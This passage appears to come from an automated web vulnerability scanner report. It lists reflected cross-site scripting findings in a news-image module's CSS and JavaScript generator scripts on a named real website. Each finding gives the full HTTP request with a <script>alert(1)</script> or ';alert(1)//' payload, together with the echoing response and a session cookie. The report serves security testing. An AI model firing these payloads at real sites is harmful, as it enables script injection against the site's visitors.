Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0e255c<script>alert(1)</script>249d8d38b12px;
   left: 0px;
   position: absolute;
   display: block;
}

div.gk_news_image_1_wrapper h2 {
   margin-bottom: 15px;
}

div.gk_news_image_1_wrapper h2 a {
   font:normal 28px Geneva, Arial, Helvet
...[SNIP]...

2.33. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [module_height parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the module_height request parameter is copied into the HTML document as plain text between tags. The payload 83595<script>alert(1)</script>8968cd8d5c9 was submitted in the module_height parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=27083595<script>alert(1)</script>8968cd8d5c9&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 27083595<script>alert(1)</script>8968cd8d5c9px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0px;
   left: 0px;
   position: absolute;
   display: block;
}

div.gk_news_image_1_wrapper h2 {
   margin-bottom: 15px;

...[SNIP]...

2.34. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [module_width parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the module_width request parameter is copied into the HTML document as plain text between tags. The payload 430cc<script>alert(1)</script>0b9b8e7996f was submitted in the module_width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615430cc<script>alert(1)</script>0b9b8e7996f&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615430cc<script>alert(1)</script>0b9b8e7996fpx;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0px;
   left: 0px;
   position: absolute;
   display: block;
}

div.gk_news_image_1_wrapper h2 {
   margi
...[SNIP]...

2.35. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [text_block_bgcolor parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the text_block_bgcolor request parameter is copied into the HTML document as plain text between tags. The payload c2c09<script>alert(1)</script>e6026c228c was submitted in the text_block_bgcolor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffffc2c09<script>alert(1)</script>e6026c228c&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...
_datas {
   display: none;
}

.gk_news_image_1_text_bg {
   padding-right: 10px;
   padding-left: 10px;
   width: 195px;
   height: 270px;
   position: absolute;
   left: 405px;
   background-color: #ffffffc2c09<script>alert(1)</script>e6026c228c;
   opacity: 0;    
}

div.gk_news_image_1_text {
   padding: 10px;
   overflow: hidden;
   width: 185px;
   height: 206px;
   position: absolute;
   left: 405px;
   top: 0px;
}

a.gk_news_image_1_prev, a.
...[SNIP]...

2.36. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [text_block_margin parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the text_block_margin request parameter is copied into the HTML document as plain text between tags. The payload 92616<script>alert(1)</script>ce159aaf62 was submitted in the text_block_margin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=40592616<script>alert(1)</script>ce159aaf62&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...

}

div.gk_news_image_1_text_datas {
   display: none;
}

.gk_news_image_1_text_bg {
   padding-right: 10px;
   padding-left: 10px;
   width: 195px;
   height: 270px;
   position: absolute;
   left: 40592616<script>alert(1)</script>ce159aaf62px;
   background-color: #ffffff;
   opacity: 0;    
}

div.gk_news_image_1_text {
   padding: 10px;
   overflow: hidden;
   width: 185px;
   height: 206px;
   position: absolute;
   left: 40592616<script>
...[SNIP]...

2.37. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [text_block_opacity parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the text_block_opacity request parameter is copied into the HTML document as plain text between tags. The payload 45c34<script>alert(1)</script>10eff4952b3 was submitted in the text_block_opacity parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=045c34<script>alert(1)</script>10eff4952b3&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...
play: none;
}

.gk_news_image_1_text_bg {
   padding-right: 10px;
   padding-left: 10px;
   width: 195px;
   height: 270px;
   position: absolute;
   left: 405px;
   background-color: #ffffff;
   opacity: 045c34<script>alert(1)</script>10eff4952b3;    
}

div.gk_news_image_1_text {
   padding: 10px;
   overflow: hidden;
   width: 185px;
   height: 206px;
   position: absolute;
   left: 405px;
   top: 0px;
}

a.gk_news_image_1_prev, a.gk_news_image_
...[SNIP]...

2.38. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [text_block_width parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the text_block_width request parameter is copied into the HTML document as plain text between tags. The payload ef2d2<script>alert(1)</script>2b50e983568 was submitted in the text_block_width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195ef2d2<script>alert(1)</script>2b50e983568&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...
Arial, Helvetica, sans-serif;
   text-decoration: none;
}

div.gk_news_image_1_text_datas {
   display: none;
}

.gk_news_image_1_text_bg {
   padding-right: 10px;
   padding-left: 10px;
   width: 195ef2d2<script>alert(1)</script>2b50e983568px;
   height: 270px;
   position: absolute;
   left: 405px;
   background-color: #ffffff;
   opacity: 0;    
}

div.gk_news_image_1_text {
   padding: 10px;
   overflow: hidden;
   width: 185px;
   height: 206
...[SNIP]...

2.39. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [thumbnail_border parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the thumbnail_border request parameter is copied into the HTML document as plain text between tags. The payload 8fc44<script>alert(1)</script>3359efc16d3 was submitted in the thumbnail_border parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=18fc44<script>alert(1)</script>3359efc16d3&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...
ws_image_1_thumbnails {
   bottom: 100px;
   margin-left: 10px;
   width: 195px;
   height: 90px;
   position: absolute;
   left: 405px;
   top: 204px;
}

.gk_news_image_1_thumb{
   margin: 5px;
   border: 18fc44<script>alert(1)</script>3359efc16d3px solid ;
   width: 66px;
   height: 44px;
   float: left;
   display:block;
}

.gk_news_image_1_tbo{
   width: 452px;
}

.gk_news_image_1_interface_buttons{
   position:absolute;
}

ul.gk_news_ima
...[SNIP]...

2.40. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [thumbnail_height parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the thumbnail_height request parameter is copied into the HTML document as plain text between tags. The payload 9673e<script>alert(1)</script>59db9d4223c was submitted in the thumbnail_height parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=449673e<script>alert(1)</script>59db9d4223c&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...
gin-left: 10px;
   width: 195px;
   height: 449685px;
   position: absolute;
   left: 405px;
   top: -449425px;
}

.gk_news_image_1_thumb{
   margin: 5px;
   border: 1px solid ;
   width: 66px;
   height: 449673e<script>alert(1)</script>59db9d4223cpx;
   float: left;
   display:block;
}

.gk_news_image_1_tbo{
   width: 316px;
}

.gk_news_image_1_interface_buttons{
   position:absolute;
}

ul.gk_news_image_1_tick_buttons{
   position: absolut
...[SNIP]...

2.41. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [thumbnail_margin parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the thumbnail_margin request parameter is copied into the HTML document as plain text between tags. The payload 9dcc8<script>alert(1)</script>ff0b9230bba was submitted in the thumbnail_margin parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=59dcc8<script>alert(1)</script>ff0b9230bba&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...

}

div.gk_news_image_1_thumbnails {
   bottom: 100px;
   margin-left: 10px;
   width: 195px;
   height: 164px;
   position: absolute;
   left: 405px;
   top: 96px;
}

.gk_news_image_1_thumb{
   margin: 59dcc8<script>alert(1)</script>ff0b9230bbapx;
   border: 1px solid ;
   width: 66px;
   height: 44px;
   float: left;
   display:block;
}

.gk_news_image_1_tbo{
   width: 748px;
}

.gk_news_image_1_interface_buttons{
   position:absolute;
}

...[SNIP]...

2.42. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [thumbnail_width parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the thumbnail_width request parameter is copied into the HTML document as plain text between tags. The payload ba4ce<script>alert(1)</script>afde6d92280 was submitted in the thumbnail_width parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66ba4ce<script>alert(1)</script>afde6d92280&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...
{
   bottom: 100px;
   margin-left: 10px;
   width: 195px;
   height: 56px;
   position: absolute;
   left: 405px;
   top: 204px;
}

.gk_news_image_1_thumb{
   margin: 5px;
   border: 1px solid ;
   width: 66ba4ce<script>alert(1)</script>afde6d92280px;
   height: 44px;
   float: left;
   display:block;
}

.gk_news_image_1_tbo{
   width: 316px;
}

.gk_news_image_1_interface_buttons{
   position:absolute;
}

ul.gk_news_image_1_tick_buttons{
   p
...[SNIP]...

2.43. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [tick_x parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the tick_x request parameter is copied into the HTML document as plain text between tags. The payload 44675<script>alert(1)</script>e58bcc8132a was submitted in the tick_x parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=40544675<script>alert(1)</script>e58bcc8132a&tick_y=-22 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...
age_1_tbo{
   width: 316px;
}

.gk_news_image_1_interface_buttons{
   position:absolute;
}

ul.gk_news_image_1_tick_buttons{
   position: absolute;
   list-style-type: none;
   top: -22px;
   left: 40544675<script>alert(1)</script>e58bcc8132apx;
   margin: 0px;
   padding: 0px;
}

ul.gk_news_image_1_tick_buttons li{
   float: left;
   padding: 0px !important;
   margin-right: 3px;
}

div.gk_news_image_1_preloader{
   position: absolute;

...[SNIP]...

2.44. http://www.soundingsonline.com/modules/mod_gk_news_image_1/css/style.php [tick_y parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/css/style.php

Issue detail

The value of the tick_y request parameter is copied into the HTML document as plain text between tags. The payload a1678<script>alert(1)</script>18a092c8e6e was submitted in the tick_y parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modules/mod_gk_news_image_1/css/style.php?text_block_background=1&text_block_bgcolor=ffffff&text_block_width=195&text_block_opacity=0&text_block_margin=405&module_width=615&module_height=270&thumbnail_bar=1&thumbnail_width=66&thumbnail_height=44&thumbnail_margin=5&thumbnail_border=1&thumbnail_bar_position=1&image_x=0&image_y=0&slides_count=4&tick_x=405&tick_y=-22a1678<script>alert(1)</script>18a092c8e6e HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/?1'=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:28:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Content-Type: text/css


div.gk_news_image_1_wrapper {
   overflow: hidden;
   border: none;
   position: relative;
   width: 615px;
   height: 270px;
   background-color: #;
   color: #fff;
}

.gk_news_image_1_slide{
   top: 0p
...[SNIP]...


.gk_news_image_1_tbo{
   width: 316px;
}

.gk_news_image_1_interface_buttons{
   position:absolute;
}

ul.gk_news_image_1_tick_buttons{
   position: absolute;
   list-style-type: none;
   top: -22a1678<script>alert(1)</script>18a092c8e6epx;
   left: 405px;
   margin: 0px;
   padding: 0px;
}

ul.gk_news_image_1_tick_buttons li{
   float: left;
   padding: 0px !important;
   margin-right: 3px;
}

div.gk_news_image_1_preloader{
   positi
...[SNIP]...

2.45. http://www.soundingsonline.com/modules/mod_gk_news_image_1/js/importer.php [animation_interval parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /modules/mod_gk_news_image_1/js/importer.php

Issue detail

The value of the animation_interval request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f0c62%3balert(1)//1b0eb0bc8a4 was submitted in the animation_interval parameter. This input was echoed as f0c62;alert(1)//1b0eb0bc8a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

